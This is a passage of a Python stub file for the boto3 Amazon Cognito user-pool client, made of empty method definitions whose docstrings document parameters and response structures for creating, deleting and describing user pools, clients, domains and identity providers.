- **AllowAdminCreateUserOnly** *(boolean) --*
Set to ``True`` if only the administrator is allowed to create user profiles. Set to ``False`` if users can sign themselves up via an app.
- **UnusedAccountValidityDays** *(integer) --*
The user account expiration limit, in days, after which the account is no longer usable. To reset the account after that time limit, you must call ``AdminCreateUser`` again, specifying ``\"RESEND\"`` for the ``MessageAction`` parameter. The default value for this parameter is 7.
.. note::
If you set a value for ``TemporaryPasswordValidityDays`` in ``PasswordPolicy`` , that value will be used and ``UnusedAccountValidityDays`` will be deprecated for that user pool.
- **InviteMessageTemplate** *(dict) --*
The message template to be used for the welcome message to new users.
See also `Customizing User Invitation Messages <http://docs.aws.amazon.com/cognito/latest/developerguide/cognito-user-pool-settings-message-customizations.html#cognito-user-pool-settings-user-invitation-message-customization>`__ .
- **SMSMessage** *(string) --*
The message template for SMS messages.
- **EmailMessage** *(string) --*
The message template for email messages.
- **EmailSubject** *(string) --*
The subject line for email messages.
:type Schema: list
:param Schema:
An array of schema attributes for the new user pool. These attributes can be standard or custom attributes.
- *(dict) --*
Contains information about the schema attribute.
- **Name** *(string) --*
A schema attribute of the name type.
- **AttributeDataType** *(string) --*
The attribute data type.
- **DeveloperOnlyAttribute** *(boolean) --*
Specifies whether the attribute type is developer only.
- **Mutable** *(boolean) --*
Specifies whether the value of the attribute can be changed.
For any user pool attribute that\'s mapped to an identity provider attribute, you must set this parameter to ``true`` . Amazon Cognito updates mapped attributes when users sign in to your application through an identity provider. If an attribute is immutable, Amazon Cognito throws an error when it attempts to update the attribute. For more information, see `Specifying Identity Provider Attribute Mappings for Your User Pool <https://docs.aws.amazon.com/cognito/latest/developerguide/cognito-user-pools-specifying-attribute-mapping.html>`__ .
- **Required** *(boolean) --*
Specifies whether a user pool attribute is required. If the attribute is required and the user does not provide a value, registration or sign-in will fail.
- **NumberAttributeConstraints** *(dict) --*
Specifies the constraints for an attribute of the number type.
- **MinValue** *(string) --*
The minimum value of an attribute that is of the number data type.
- **MaxValue** *(string) --*
The maximum value of an attribute that is of the number data type.
- **StringAttributeConstraints** *(dict) --*
Specifies the constraints for an attribute of the string type.
- **MinLength** *(string) --*
The minimum length.
- **MaxLength** *(string) --*
The maximum length.
:type UserPoolAddOns: dict
:param UserPoolAddOns:
Used to enable advanced security risk detection. Set the key ``AdvancedSecurityMode`` to the value \"AUDIT\".
- **AdvancedSecurityMode** *(string) --* **[REQUIRED]**
The advanced security mode.
:rtype: dict
:returns:
"""
pass
def create_user_pool_client(self, UserPoolId: str, ClientName: str, GenerateSecret: bool = None, RefreshTokenValidity: int = None, ReadAttributes: List = None, WriteAttributes: List = None, ExplicitAuthFlows: List = None, SupportedIdentityProviders: List = None, CallbackURLs: List = None, LogoutURLs: List = None, DefaultRedirectURI: str = None, AllowedOAuthFlows: List = None, AllowedOAuthScopes: List = None, AllowedOAuthFlowsUserPoolClient: bool = None, AnalyticsConfiguration: Dict = None) -> Dict:
    """
    Create an app client for the specified user pool.

    See also: `AWS API Documentation
    <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/CreateUserPoolClient>`_

    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]** The user pool ID for the user pool where
        you want to create a user pool client.
    :type ClientName: string
    :param ClientName: **[REQUIRED]** The client name for the user pool client
        you would like to create.
    :type GenerateSecret: boolean
    :param GenerateSecret: Whether to generate a secret for the user pool
        client being created.
    :type RefreshTokenValidity: integer
    :param RefreshTokenValidity: The time limit, in days, after which the
        refresh token is no longer valid and cannot be used.
    :type ReadAttributes: list
    :param ReadAttributes: The read attributes (list of strings).
    :type WriteAttributes: list
    :param WriteAttributes: The user pool attributes that the app client can
        write to. If the client allows sign-in through an identity provider,
        this array must include all attributes that are mapped to identity
        provider attributes; see `Specifying Identity Provider Attribute
        Mappings for Your User Pool
        <https://docs.aws.amazon.com/cognito/latest/developerguide/cognito-user-pools-specifying-attribute-mapping.html>`__ .
    :type ExplicitAuthFlows: list
    :param ExplicitAuthFlows: The explicit authentication flows. Valid values:
        ``ADMIN_NO_SRP_AUTH``, ``CUSTOM_AUTH_FLOW_ONLY``, ``USER_PASSWORD_AUTH``.
    :type SupportedIdentityProviders: list
    :param SupportedIdentityProviders: Provider names for the identity
        providers supported on this client. The following are supported:
        ``COGNITO``, ``Facebook``, ``Google`` and ``LoginWithAmazon``.
    :type CallbackURLs: list
    :param CallbackURLs: Allowed redirect (callback) URLs for the identity
        providers. Each redirect URI must be an absolute URI, be registered
        with the authorization server, and not include a fragment component
        (see `OAuth 2.0 - Redirection Endpoint
        <https://tools.ietf.org/html/rfc6749#section-3.1.2>`__ ). Amazon
        Cognito requires HTTPS over HTTP except for http://localhost for
        testing purposes only; app callback URLs such as myapp://example are
        also supported.
    :type LogoutURLs: list
    :param LogoutURLs: Allowed logout URLs for the identity providers.
    :type DefaultRedirectURI: string
    :param DefaultRedirectURI: The default redirect URI; must be in the
        ``CallbackURLs`` list and satisfy the same URI constraints as
        ``CallbackURLs``.
    :type AllowedOAuthFlows: list
    :param AllowedOAuthFlows: Set to ``code`` to initiate a code grant flow,
        which provides an authorization code as the response that can be
        exchanged for access tokens with the token endpoint. Set to ``token``
        to specify that the client should get the access token (and,
        optionally, ID token, based on scopes) directly.
    :type AllowedOAuthScopes: list
    :param AllowedOAuthScopes: Allowed ``OAuth`` scopes. Currently supported
        values are ``"phone"``, ``"email"``, ``"openid"``, and ``"Cognito"``.
    :type AllowedOAuthFlowsUserPoolClient: boolean
    :param AllowedOAuthFlowsUserPoolClient: Set to ``True`` if the client is
        allowed to follow the OAuth protocol when interacting with Cognito
        user pools.
    :type AnalyticsConfiguration: dict
    :param AnalyticsConfiguration: The Amazon Pinpoint analytics configuration
        for collecting metrics for this user pool. Keys: ``ApplicationId``
        (string, required), ``RoleArn`` (string, required), ``ExternalId``
        (string, required), ``UserDataShared`` (boolean — if ``true``, Amazon
        Cognito includes user data in the events it publishes to Amazon
        Pinpoint analytics).
    :rtype: dict
    :returns: A dict with a ``UserPoolClient`` key describing the client that
        was just created: ``UserPoolId``, ``ClientName``, ``ClientId``,
        ``ClientSecret``, ``LastModifiedDate``, ``CreationDate``,
        ``RefreshTokenValidity``, ``ReadAttributes``, ``WriteAttributes``,
        ``ExplicitAuthFlows``, ``SupportedIdentityProviders``,
        ``CallbackURLs``, ``LogoutURLs``, ``DefaultRedirectURI``,
        ``AllowedOAuthFlows``, ``AllowedOAuthScopes``,
        ``AllowedOAuthFlowsUserPoolClient``, and ``AnalyticsConfiguration``.
    """
    pass
def create_user_pool_domain(self, Domain: str, UserPoolId: str, CustomDomainConfig: Dict = None) -> Dict:
    """
    Create a new domain for a user pool.

    See also: `AWS API Documentation
    <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/CreateUserPoolDomain>`_

    :type Domain: string
    :param Domain: **[REQUIRED]** The domain string.
    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]** The user pool ID.
    :type CustomDomainConfig: dict
    :param CustomDomainConfig: The configuration for a custom domain that
        hosts the sign-up and sign-in webpages for your application. Provide
        this parameter only if you want to use a custom domain for your user
        pool; otherwise, exclude it and use the Amazon Cognito hosted domain
        instead (see `Configuring a User Pool Domain
        <https://docs.aws.amazon.com/cognito/latest/developerguide/cognito-user-pools-assign-domain.html>`__ ).
        Key: ``CertificateArn`` (string, required) — the ARN of an AWS
        Certificate Manager SSL certificate used for the subdomain of your
        custom domain.
    :rtype: dict
    :returns: A dict with a ``CloudFrontDomain`` key — the Amazon CloudFront
        endpoint that you use as the target of the alias that you set up with
        your Domain Name Service (DNS) provider.
    """
    pass
def delete_group(self, GroupName: str, UserPoolId: str):
    """
    Delete a group from a user pool. Currently only groups with no members
    can be deleted. Requires developer credentials.

    See also: `AWS API Documentation
    <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/DeleteGroup>`_

    :type GroupName: string
    :param GroupName: **[REQUIRED]** The name of the group.
    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]** The user pool ID for the user pool.
    :returns: None
    """
    pass
def delete_identity_provider(self, UserPoolId: str, ProviderName: str):
    """
    Delete an identity provider from a user pool.

    See also: `AWS API Documentation
    <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/DeleteIdentityProvider>`_

    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]** The user pool ID.
    :type ProviderName: string
    :param ProviderName: **[REQUIRED]** The identity provider name.
    :returns: None
    """
    pass
def delete_resource_server(self, UserPoolId: str, Identifier: str):
    """
    Delete a resource server.

    See also: `AWS API Documentation
    <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/DeleteResourceServer>`_

    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]** The user pool ID for the user pool that
        hosts the resource server.
    :type Identifier: string
    :param Identifier: **[REQUIRED]** The identifier for the resource server.
    :returns: None
    """
    pass
def delete_user(self, AccessToken: str):
    """
    Allow a user to delete himself or herself.

    See also: `AWS API Documentation
    <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/DeleteUser>`_

    :type AccessToken: string
    :param AccessToken: **[REQUIRED]** The access token from a request to
        delete a user.
    :returns: None
    """
    pass
def delete_user_attributes(self, UserAttributeNames: List, AccessToken: str) -> Dict:
    """
    Delete the attributes for a user.

    See also: `AWS API Documentation
    <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/DeleteUserAttributes>`_

    :type UserAttributeNames: list
    :param UserAttributeNames: **[REQUIRED]** An array of strings representing
        the user attribute names you wish to delete. For custom attributes,
        you must prepend the ``custom:`` prefix to the attribute name.
    :type AccessToken: string
    :param AccessToken: **[REQUIRED]** The access token used in the request to
        delete user attributes.
    :rtype: dict
    :returns: An empty dict — the response from the server to delete user
        attributes.
    """
    pass
def delete_user_pool(self, UserPoolId: str):
    """
    Delete the specified Amazon Cognito user pool.

    See also: `AWS API Documentation
    <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/DeleteUserPool>`_

    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]** The user pool ID for the user pool you
        want to delete.
    :returns: None
    """
    pass
def delete_user_pool_client(self, UserPoolId: str, ClientId: str):
    """
    Allow the developer to delete the user pool client.

    See also: `AWS API Documentation
    <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/DeleteUserPoolClient>`_

    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]** The user pool ID for the user pool where
        you want to delete the client.
    :type ClientId: string
    :param ClientId: **[REQUIRED]** The app client ID of the app associated
        with the user pool.
    :returns: None
    """
    pass
def delete_user_pool_domain(self, Domain: str, UserPoolId: str) -> Dict:
    """
    Delete a domain for a user pool.

    See also: `AWS API Documentation
    <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/DeleteUserPoolDomain>`_

    :type Domain: string
    :param Domain: **[REQUIRED]** The domain string.
    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]** The user pool ID.
    :rtype: dict
    :returns: An empty dict.
    """
    pass
def describe_identity_provider(self, UserPoolId: str, ProviderName: str) -> Dict:
    """
    Get information about a specific identity provider.

    See also: `AWS API Documentation
    <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/DescribeIdentityProvider>`_

    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]** The user pool ID.
    :type ProviderName: string
    :param ProviderName: **[REQUIRED]** The identity provider name.
    :rtype: dict
    :returns: A dict with an ``IdentityProvider`` key describing the
        identity provider:

        - ``UserPoolId`` *(string)* — the user pool ID.
        - ``ProviderName`` *(string)* — the identity provider name.
        - ``ProviderType`` *(string)* — one of
          ``'SAML'|'Facebook'|'Google'|'LoginWithAmazon'|'OIDC'``.
        - ``ProviderDetails`` *(dict)* — the identity provider details, such
          as ``MetadataURL`` and ``MetadataFile``.
        - ``AttributeMapping`` *(dict)* — a mapping of identity provider
          attributes to standard and custom user pool attributes.
        - ``IdpIdentifiers`` *(list of string)* — identity provider
          identifiers.
        - ``LastModifiedDate`` *(datetime)* — the date the identity provider
          was last modified.
        - ``CreationDate`` *(datetime)* — the date the identity provider was
          created.
    """
    pass
def describe_resource_server(self, UserPoolId: str, Identifier: str) -> Dict:
    """
    Describe a resource server.

    See also: `AWS API Documentation
    <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/DescribeResourceServer>`_

    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]** The user pool ID for the user pool that
        hosts the resource server.
    :type Identifier: string
    :param Identifier: **[REQUIRED]** The identifier for the resource server.
    :rtype: dict
    :returns: A dict with a ``ResourceServer`` key describing the resource
        server:

        - ``UserPoolId`` *(string)* — the user pool ID for the user pool that
          hosts the resource server.
        - ``Identifier`` *(string)* — the identifier for the resource server.
        - ``Name`` *(string)* — the name of the resource server.
        - ``Scopes`` *(list of dict)* — the scopes defined for the resource
          server, each with ``ScopeName`` (the name of the scope) and
          ``ScopeDescription`` (a description of the scope).
    """
    pass
def describe_risk_configuration(self, UserPoolId: str, ClientId: str = None) -> Dict:
    """
    Describe the risk configuration.

    See also: `AWS API Documentation
    <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/DescribeRiskConfiguration>`_

    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]** The user pool ID.
    :type ClientId: string
    :param ClientId: The app client ID.
    :rtype: dict
    :returns: A dict with a ``RiskConfiguration`` key describing the risk
        configuration:

        - ``UserPoolId`` *(string)* — the user pool ID.
        - ``ClientId`` *(string)* — the app client ID.
        - ``CompromisedCredentialsRiskConfiguration`` *(dict)* — the
          compromised credentials risk configuration, including:

          - ``EventFilter`` *(list)* — the events to perform the action for
            (``'SIGN_IN'|'PASSWORD_CHANGE'|'SIGN_UP'``); the default is to
            perform all events if no event filter is specified.
          - ``Actions`` *(dict)* — with ``EventAction`` set to
            ``'BLOCK'|'NO_ACTION'``.

        - ``AccountTakeoverRiskConfiguration`` *(dict)* — the account takeover
          risk configuration, including:

          - ``NotifyConfiguration`` *(dict)* — used to construct email
            notifications: ``From`` (the sending email address, which must be
            either individually verified with Amazon SES or from a domain
            verified with Amazon SES), ``ReplyTo`` (the reply-to destination),
            ``SourceArn`` (the ARN of the identity associated with the
            sending authorization policy, permitting Amazon Cognito to send
            for the ``From`` address), and the email templates ``BlockEmail``
            (used when a detected risk event is blocked), ``NoActionEmail``
            (used when a detected risk event is allowed), and ``MfaEmail``
            (used when MFA is challenged as part of a detected risk) — each
            with ``Subject``, ``HtmlBody``, and ``TextBody``.
          - ``Actions`` *(dict)* — ``LowAction``, ``MediumAction``, and
            ``HighAction``, each with ``Notify`` (whether to send a
            notification) and ``EventAction``: ``BLOCK`` blocks the request;
            ``MFA_IF_CONFIGURED`` throws an MFA challenge if the user has
            configured it, else allows the request; ``MFA_REQUIRED`` throws
            an MFA challenge if the user has configured it, else blocks the
            request; ``NO_ACTION`` allows the user sign-in.

        - ``RiskExceptionConfiguration`` *(dict)* — the configuration to
          override the risk decision: ``BlockedIPRangeList`` (always block
          pre-authentication requests from these CIDR IP ranges) and
          ``SkippedIPRangeList`` (skip risk detection for these CIDR IP
          ranges).
        - ``LastModifiedDate`` *(datetime)* — the last modified date.
    """
    pass
def describe_user_import_job(self, UserPoolId: str, JobId: str) -> Dict:
    """
    Describes the user import job.
    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/DescribeUserImportJob>`_
    **Request Syntax**
    ::
        response = client.describe_user_import_job(
            UserPoolId='string',
            JobId='string'
        )
    **Response Syntax**
    ::
        {
            'UserImportJob': {
                'JobName': 'string',
                'JobId': 'string',
                'UserPoolId': 'string',
                'PreSignedUrl': 'string',
                'CreationDate': datetime(2015, 1, 1),
                'StartDate': datetime(2015, 1, 1),
                'CompletionDate': datetime(2015, 1, 1),
                'Status': 'Created'|'Pending'|'InProgress'|'Stopping'|'Expired'|'Stopped'|'Failed'|'Succeeded',
                'CloudWatchLogsRoleArn': 'string',
                'ImportedUsers': 123,
                'SkippedUsers': 123,
                'FailedUsers': 123,
                'CompletionMessage': 'string'
            }
        }
    **Response Structure**
    - *(dict) --*
    Represents the response from the server to the request to describe the user import job.
    - **UserImportJob** *(dict) --*
    The job object that represents the user import job.
    - **JobName** *(string) --*
    The job name for the user import job.
    - **JobId** *(string) --*
    The job ID for the user import job.
    - **UserPoolId** *(string) --*
    The user pool ID for the user pool that the users are being imported into.
    - **PreSignedUrl** *(string) --*
    The pre-signed URL to be used to upload the ``.csv`` file.
    - **CreationDate** *(datetime) --*
    The date the user import job was created.
    - **StartDate** *(datetime) --*
    The date when the user import job was started.
    - **CompletionDate** *(datetime) --*
    The date when the user import job was completed.
    - **Status** *(string) --*
    The status of the user import job. One of the following:
    * ``Created`` - The job was created but not started.
    * ``Pending`` - A transition state. You have started the job, but it has not begun importing users yet.
    * ``InProgress`` - The job has started, and users are being imported.
    * ``Stopping`` - You have stopped the job, but the job has not stopped importing users yet.
    * ``Stopped`` - You have stopped the job, and the job has stopped importing users.
    * ``Succeeded`` - The job has completed successfully.
    * ``Failed`` - The job has stopped due to an error.
    * ``Expired`` - You created a job, but did not start the job within 24-48 hours. All data associated with the job was deleted, and the job cannot be started.
    - **CloudWatchLogsRoleArn** *(string) --*
    The role ARN for the Amazon CloudWatch Logging role for the user import job. For more information, see "Creating the CloudWatch Logs IAM Role" in the Amazon Cognito Developer Guide.
    - **ImportedUsers** *(integer) --*
    The number of users that were successfully imported.
    - **SkippedUsers** *(integer) --*
    The number of users that were skipped.
    - **FailedUsers** *(integer) --*
    The number of users that could not be imported.
    - **CompletionMessage** *(string) --*
    The message returned when the user import job is completed.
    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]**
    The user pool ID for the user pool that the users are being imported into.
    :type JobId: string
    :param JobId: **[REQUIRED]**
    The job ID for the user import job.
    :rtype: dict
    :returns:
    """
    # NOTE: auto-generated documentation stub — the concrete request dispatch
    # is presumably built at runtime by botocore, so the body is empty.
    pass
def describe_user_pool(self, UserPoolId: str) -> Dict:
    """
    Returns the configuration information and metadata of the specified user pool.
    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/DescribeUserPool>`_
    **Request Syntax**
    ::
        response = client.describe_user_pool(
            UserPoolId='string'
        )
    **Response Syntax**
    ::
        {
            'UserPool': {
                'Id': 'string',
                'Name': 'string',
                'Policies': {
                    'PasswordPolicy': {
                        'MinimumLength': 123,
                        'RequireUppercase': True|False,
                        'RequireLowercase': True|False,
                        'RequireNumbers': True|False,
                        'RequireSymbols': True|False
                    }
                },
                'LambdaConfig': {
                    'PreSignUp': 'string',
                    'CustomMessage': 'string',
                    'PostConfirmation': 'string',
                    'PreAuthentication': 'string',
                    'PostAuthentication': 'string',
                    'DefineAuthChallenge': 'string',
                    'CreateAuthChallenge': 'string',
                    'VerifyAuthChallengeResponse': 'string',
                    'PreTokenGeneration': 'string',
                    'UserMigration': 'string'
                },
                'Status': 'Enabled'|'Disabled',
                'LastModifiedDate': datetime(2015, 1, 1),
                'CreationDate': datetime(2015, 1, 1),
                'SchemaAttributes': [
                    {
                        'Name': 'string',
                        'AttributeDataType': 'String'|'Number'|'DateTime'|'Boolean',
                        'DeveloperOnlyAttribute': True|False,
                        'Mutable': True|False,
                        'Required': True|False,
                        'NumberAttributeConstraints': {
                            'MinValue': 'string',
                            'MaxValue': 'string'
                        },
                        'StringAttributeConstraints': {
                            'MinLength': 'string',
                            'MaxLength': 'string'
                        }
                    },
                ],
                'AutoVerifiedAttributes': [
                    'phone_number'|'email',
                ],
                'AliasAttributes': [
                    'phone_number'|'email'|'preferred_username',
                ],
                'UsernameAttributes': [
                    'phone_number'|'email',
                ],
                'SmsVerificationMessage': 'string',
                'EmailVerificationMessage': 'string',
                'EmailVerificationSubject': 'string',
                'VerificationMessageTemplate': {
                    'SmsMessage': 'string',
                    'EmailMessage': 'string',
                    'EmailSubject': 'string',
                    'EmailMessageByLink': 'string',
                    'EmailSubjectByLink': 'string',
                    'DefaultEmailOption': 'CONFIRM_WITH_LINK'|'CONFIRM_WITH_CODE'
                },
                'SmsAuthenticationMessage': 'string',
                'MfaConfiguration': 'OFF'|'ON'|'OPTIONAL',
                'DeviceConfiguration': {
                    'ChallengeRequiredOnNewDevice': True|False,
                    'DeviceOnlyRememberedOnUserPrompt': True|False
                },
                'EstimatedNumberOfUsers': 123,
                'EmailConfiguration': {
                    'SourceArn': 'string',
                    'ReplyToEmailAddress': 'string',
                    'EmailSendingAccount': 'COGNITO_DEFAULT'|'DEVELOPER'
                },
                'SmsConfiguration': {
                    'SnsCallerArn': 'string',
                    'ExternalId': 'string'
                },
                'UserPoolTags': {
                    'string': 'string'
                },
                'SmsConfigurationFailure': 'string',
                'EmailConfigurationFailure': 'string',
                'Domain': 'string',
                'CustomDomain': 'string',
                'AdminCreateUserConfig': {
                    'AllowAdminCreateUserOnly': True|False,
                    'UnusedAccountValidityDays': 123,
                    'InviteMessageTemplate': {
                        'SMSMessage': 'string',
                        'EmailMessage': 'string',
                        'EmailSubject': 'string'
                    }
                },
                'UserPoolAddOns': {
                    'AdvancedSecurityMode': 'OFF'|'AUDIT'|'ENFORCED'
                },
                'Arn': 'string'
            }
        }
    **Response Structure**
    - *(dict) --*
    Represents the response to describe the user pool.
    - **UserPool** *(dict) --*
    The container of metadata returned by the server to describe the pool.
    - **Id** *(string) --*
    The ID of the user pool.
    - **Name** *(string) --*
    The name of the user pool.
    - **Policies** *(dict) --*
    The policies associated with the user pool.
    - **PasswordPolicy** *(dict) --*
    The password policy.
    - **MinimumLength** *(integer) --*
    The minimum length of the password policy that you have set. Cannot be less than 6.
    - **RequireUppercase** *(boolean) --*
    In the password policy that you have set, refers to whether you have required users to use at least one uppercase letter in their password.
    - **RequireLowercase** *(boolean) --*
    In the password policy that you have set, refers to whether you have required users to use at least one lowercase letter in their password.
    - **RequireNumbers** *(boolean) --*
    In the password policy that you have set, refers to whether you have required users to use at least one number in their password.
    - **RequireSymbols** *(boolean) --*
    In the password policy that you have set, refers to whether you have required users to use at least one symbol in their password.
    - **LambdaConfig** *(dict) --*
    The AWS Lambda triggers associated with the user pool.
    - **PreSignUp** *(string) --*
    A pre-registration AWS Lambda trigger.
    - **CustomMessage** *(string) --*
    A custom Message AWS Lambda trigger.
    - **PostConfirmation** *(string) --*
    A post-confirmation AWS Lambda trigger.
    - **PreAuthentication** *(string) --*
    A pre-authentication AWS Lambda trigger.
    - **PostAuthentication** *(string) --*
    A post-authentication AWS Lambda trigger.
    - **DefineAuthChallenge** *(string) --*
    Defines the authentication challenge.
    - **CreateAuthChallenge** *(string) --*
    Creates an authentication challenge.
    - **VerifyAuthChallengeResponse** *(string) --*
    Verifies the authentication challenge response.
    - **PreTokenGeneration** *(string) --*
    A Lambda trigger that is invoked before token generation.
    - **UserMigration** *(string) --*
    The user migration Lambda config type.
    - **Status** *(string) --*
    The status of a user pool.
    - **LastModifiedDate** *(datetime) --*
    The date the user pool was last modified.
    - **CreationDate** *(datetime) --*
    The date the user pool was created.
    - **SchemaAttributes** *(list) --*
    A container with the schema attributes of a user pool.
    - *(dict) --*
    Contains information about the schema attribute.
    - **Name** *(string) --*
    A schema attribute of the name type.
    - **AttributeDataType** *(string) --*
    The attribute data type.
    - **DeveloperOnlyAttribute** *(boolean) --*
    Specifies whether the attribute type is developer only.
    - **Mutable** *(boolean) --*
    Specifies whether the value of the attribute can be changed.
    For any user pool attribute that's mapped to an identity provider attribute, you must set this parameter to ``true`` . Amazon Cognito updates mapped attributes when users sign in to your application through an identity provider. If an attribute is immutable, Amazon Cognito throws an error when it attempts to update the attribute. For more information, see `Specifying Identity Provider Attribute Mappings for Your User Pool <https://docs.aws.amazon.com/cognito/latest/developerguide/cognito-user-pools-specifying-attribute-mapping.html>`__ .
    - **Required** *(boolean) --*
    Specifies whether a user pool attribute is required. If the attribute is required and the user does not provide a value, registration or sign-in will fail.
    - **NumberAttributeConstraints** *(dict) --*
    Specifies the constraints for an attribute of the number type.
    - **MinValue** *(string) --*
    The minimum value of an attribute that is of the number data type.
    - **MaxValue** *(string) --*
    The maximum value of an attribute that is of the number data type.
    - **StringAttributeConstraints** *(dict) --*
    Specifies the constraints for an attribute of the string type.
    - **MinLength** *(string) --*
    The minimum length.
    - **MaxLength** *(string) --*
    The maximum length.
    - **AutoVerifiedAttributes** *(list) --*
    Specifies the attributes that are auto-verified in a user pool.
    - *(string) --*
    - **AliasAttributes** *(list) --*
    Specifies the attributes that are aliased in a user pool.
    - *(string) --*
    - **UsernameAttributes** *(list) --*
    Specifies whether email addresses or phone numbers can be specified as usernames when a user signs up.
    - *(string) --*
    - **SmsVerificationMessage** *(string) --*
    The contents of the SMS verification message.
    - **EmailVerificationMessage** *(string) --*
    The contents of the email verification message.
    - **EmailVerificationSubject** *(string) --*
    The subject of the email verification message.
    - **VerificationMessageTemplate** *(dict) --*
    The template for verification messages.
    - **SmsMessage** *(string) --*
    The SMS message template.
    - **EmailMessage** *(string) --*
    The email message template.
    - **EmailSubject** *(string) --*
    The subject line for the email message template.
    - **EmailMessageByLink** *(string) --*
    The email message template for sending a confirmation link to the user.
    - **EmailSubjectByLink** *(string) --*
    The subject line for the email message template for sending a confirmation link to the user.
    - **DefaultEmailOption** *(string) --*
    The default email option.
    - **SmsAuthenticationMessage** *(string) --*
    The contents of the SMS authentication message.
    - **MfaConfiguration** *(string) --*
    Can be one of the following values:
    * ``OFF`` - MFA tokens are not required and cannot be specified during user registration.
    * ``ON`` - MFA tokens are required for all user registrations. You can only specify required when you are initially creating a user pool.
    * ``OPTIONAL`` - Users have the option when registering to create an MFA token.
    - **DeviceConfiguration** *(dict) --*
    The device configuration.
    - **ChallengeRequiredOnNewDevice** *(boolean) --*
    Indicates whether a challenge is required on a new device. Only applicable to a new device.
    - **DeviceOnlyRememberedOnUserPrompt** *(boolean) --*
    If true, a device is only remembered on user prompt.
    - **EstimatedNumberOfUsers** *(integer) --*
    A number estimating the size of the user pool.
    - **EmailConfiguration** *(dict) --*
    The email configuration.
    - **SourceArn** *(string) --*
    The Amazon Resource Name (ARN) of a verified email address in Amazon SES. This email address is used in one of the following ways, depending on the value that you specify for the ``EmailSendingAccount`` parameter:
    * If you specify ``COGNITO_DEFAULT`` , Amazon Cognito uses this address as the custom FROM address when it emails your users by using its built-in email account.
    * If you specify ``DEVELOPER`` , Amazon Cognito emails your users with this address by calling Amazon SES on your behalf.
    - **ReplyToEmailAddress** *(string) --*
    The destination to which the receiver of the email should reply to.
    - **EmailSendingAccount** *(string) --*
    Specifies whether Amazon Cognito emails your users by using its built-in email functionality or your Amazon SES email configuration. Specify one of the following values:
    COGNITO_DEFAULT
    When Amazon Cognito emails your users, it uses its built-in email functionality. When you use the default option, Amazon Cognito allows only a limited number of emails each day for your user pool. For typical production environments, the default email limit is below the required delivery volume. To achieve a higher delivery volume, specify DEVELOPER to use your Amazon SES email configuration.
    To look up the email delivery limit for the default option, see `Limits in Amazon Cognito <https://docs.aws.amazon.com/cognito/latest/developerguide/limits.html>`__ in the *Amazon Cognito Developer Guide* .
    The default FROM address is no-reply@verificationemail.com. To customize the FROM address, provide the ARN of an Amazon SES verified email address for the ``SourceArn`` parameter.
    DEVELOPER
    When Amazon Cognito emails your users, it uses your Amazon SES configuration. Amazon Cognito calls Amazon SES on your behalf to send email from your verified email address. When you use this option, the email delivery limits are the same limits that apply to your Amazon SES verified email address in your AWS account.
    If you use this option, you must provide the ARN of an Amazon SES verified email address for the ``SourceArn`` parameter.
    Before Amazon Cognito can email your users, it requires additional permissions to call Amazon SES on your behalf. When you update your user pool with this option, Amazon Cognito creates a *service-linked role* , which is a type of IAM role, in your AWS account. This role contains the permissions that allow Amazon Cognito to access Amazon SES and send email messages with your address. For more information about the service-linked role that Amazon Cognito creates, see `Using Service-Linked Roles for Amazon Cognito <https://docs.aws.amazon.com/cognito/latest/developerguide/using-service-linked-roles.html>`__ in the *Amazon Cognito Developer Guide* .
    - **SmsConfiguration** *(dict) --*
    The SMS configuration.
    - **SnsCallerArn** *(string) --*
    The Amazon Resource Name (ARN) of the Amazon Simple Notification Service (SNS) caller.
    - **ExternalId** *(string) --*
    The external ID.
    - **UserPoolTags** *(dict) --*
    The tags that are assigned to the user pool. A tag is a label that you can apply to user pools to categorize and manage them in different ways, such as by purpose, owner, environment, or other criteria.
    - *(string) --*
    - *(string) --*
    - **SmsConfigurationFailure** *(string) --*
    The reason why the SMS configuration cannot send the messages to your users.
    - **EmailConfigurationFailure** *(string) --*
    The reason why the email configuration cannot send the messages to your users.
    - **Domain** *(string) --*
    Holds the domain prefix if the user pool has a domain associated with it.
    - **CustomDomain** *(string) --*
    A custom domain name that you provide to Amazon Cognito. This parameter applies only if you use a custom domain to host the sign-up and sign-in pages for your application. For example: ``auth.example.com`` .
    For more information about adding a custom domain to your user pool, see `Using Your Own Domain for the Hosted UI <https://docs.aws.amazon.com/cognito/latest/developerguide/cognito-user-pools-add-custom-domain.html>`__ .
    - **AdminCreateUserConfig** *(dict) --*
    The configuration for ``AdminCreateUser`` requests.
    - **AllowAdminCreateUserOnly** *(boolean) --*
    Set to ``True`` if only the administrator is allowed to create user profiles. Set to ``False`` if users can sign themselves up via an app.
    - **UnusedAccountValidityDays** *(integer) --*
    The user account expiration limit, in days, after which the account is no longer usable. To reset the account after that time limit, you must call ``AdminCreateUser`` again, specifying ``"RESEND"`` for the ``MessageAction`` parameter. The default value for this parameter is 7.
    .. note::
    If you set a value for ``TemporaryPasswordValidityDays`` in ``PasswordPolicy`` , that value will be used and ``UnusedAccountValidityDays`` will be deprecated for that user pool.
